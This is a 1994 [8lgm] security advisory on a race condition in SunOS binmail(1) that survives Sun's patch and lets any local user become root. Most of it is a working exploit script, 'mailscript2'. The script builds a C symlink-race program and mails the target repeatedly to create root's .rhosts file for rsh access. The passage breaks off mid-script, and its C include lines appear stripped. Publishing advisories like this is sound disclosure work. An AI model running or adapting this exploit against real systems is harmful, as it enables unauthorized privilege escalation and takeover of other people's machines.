[8lgm]-Advisory-6.UNIX.mail2.2-May-1994 PROGRAM: binmail(1) (/usr/bin/mail) VULNERABLE OS's: SunOS 4.1.x with Sun's latest binmail patch - 100224-07. DESCRIPTION: Sun released a patch 100224-07 to fix the problems described in [8lgm]-Advisory-5.UNIX.mail.24-Jan-1992. After 5 weeks, Sun have produced a fix which will defeat our original script, but the original problem remains, and is now even worse then the original! The old race condition still exists in the patched binmail(1), which allows files to be created in arbitrary places on the filesystem. These files can be owned by arbitrary (usually system) users. A new problem allows 0 length files to be created anywhere in the filesystem, even without a race. IMPACT: Any user with access to binmail(1) can become root. REPEAT BY: This example demonstrates how to become root on most affected machines by creating root's .rhosts file. Please do not do this unless you have permission. Note that this script will only create new files, not append to existing ones (as did the one in the previous advisory). A variation on this script could easily be written to append to existing files. On the other hand, you are now virtually guaranteed to win this race, which is what makes this problem worse than the original. Create the following file, 'mailscript2': 8<--------------------------- cut here ---------------------------- #!/bin/sh # # Syntax: mailscript2 user target-file rsh-user # # This exploits a flaw in SunOS binmail(1), and attempts # to become the specified 'user', by creating a .rhosts # file and using rsh. # # Written 1994 by [8LGM] # Please do not use this script without permission. # PATH=/usr/ucb:/usr/bin:/bin export PATH IFS=" " export IFS PROG="`basename $0`" SPOOLDIR="/var/spool/mail" # Check args if [ $# -ne 3 ]; then echo "Syntax: $PROG user target-file rsh-user" exit 1 fi TARGET="$1" TARGET_FILE="$2" RSH_USER="$3" # Check we're on SunOS if [ "x`uname -s`" != "xSunOS" ]; then echo "Sorry, this only works on SunOS" exit 1 fi # Check user exists grep "^$TARGET:" /etc/passwd >/dev/null 2>&1 if [ $? -ne 0 ]; then echo "$PROG: Warning, $TARGET not in local passwd file" # We continue though, might be in the YP passwd file fi # Check target file if [ -f $TARGET_FILE ]; then OLD_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'` 2>/dev/null echo "$PROG: Warning, $TARGET_FILE already exists, cant race with this script" exit 1 else OLD_TARGET_LEN=0 fi # Delete spool file if its a link, and we are able if [ -h "$SPOOLDIR/$TARGET" ]; then rm -f "$SPOOLDIR/$TARGET" # Dont worry about errors, we catch it below fi # Check mail file if [ -f "$SPOOLDIR/$TARGET" ]; then echo "$PROG: ${TARGET}'s mail file exists." exit 1 fi # Make the race program cat >mailrace.c << 'EOF' #include #include main(argc,argv) int argc; char *argv[]; { if (argc != 3) { fprintf(stderr, "Usage: %s mailfile newfile\n", argv[0]); exit(1); } symlink(argv[2], argv[1]); while(access(argv[2], F_OK)); unlink(argv[1]); close(creat(argv[1], 0600)); } EOF cc -o mailrace mailrace.c # Check we now have mailrace if [ ! -x "mailrace" ]; then echo "$PROG: couldnt compile mailrace.c - check it out" exit 1 fi # Start mailrace ./mailrace $SPOOLDIR/$TARGET $TARGET_FILE & RACE_PID=$! # Send mail to the user NEW_TARGET_LEN=$OLD_TARGET_LEN while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do echo "Sending mail to $TARGET" echo "localhost $USER" | /bin/mail $TARGET sleep 10 kill -STOP $RACE_PID rm -f $SPOOLDIR/$TARGET >/dev/null 2>&1 if [ -f $SPOOLDIR/$TARGET ]; then echo "$PRO